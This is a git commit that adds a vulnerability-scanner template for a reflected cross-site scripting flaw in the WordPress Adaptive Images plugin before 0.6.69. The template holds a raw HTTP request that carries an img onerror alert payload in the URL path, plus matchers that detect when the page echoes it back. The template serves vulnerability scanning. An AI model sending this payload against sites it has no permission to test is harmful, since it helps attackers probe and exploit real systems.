Create wp-adaptive-xss.yaml

2022-02-27 21:20:50 +05:30 · 2022-02-27 21:20:50 +05:30 · ad01679036
parent 7cd7940f8e
commit ad01679036
1 changed files with 26 additions and 0 deletions
--- a/vulnerabilities/wordpress/wp-adaptive-xss.yaml
+++ b/vulnerabilities/wordpress/wp-adaptive-xss.yaml
@ -0,0 +1,26 @@
+id: wp-adaptive-xss
+
+info:
+  name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
+  reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
+  tags: tags
+
+requests:
+- raw:
+  - |+
+    GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
+    Host: {{Hostname}}
+
+
+  matchers-condition: and
+  matchers:
+  - type: word
+    part: body
+    words:
+    - <img/src/onerror=alert("document.domain")>
+  - type: status
+    status:
+    - 200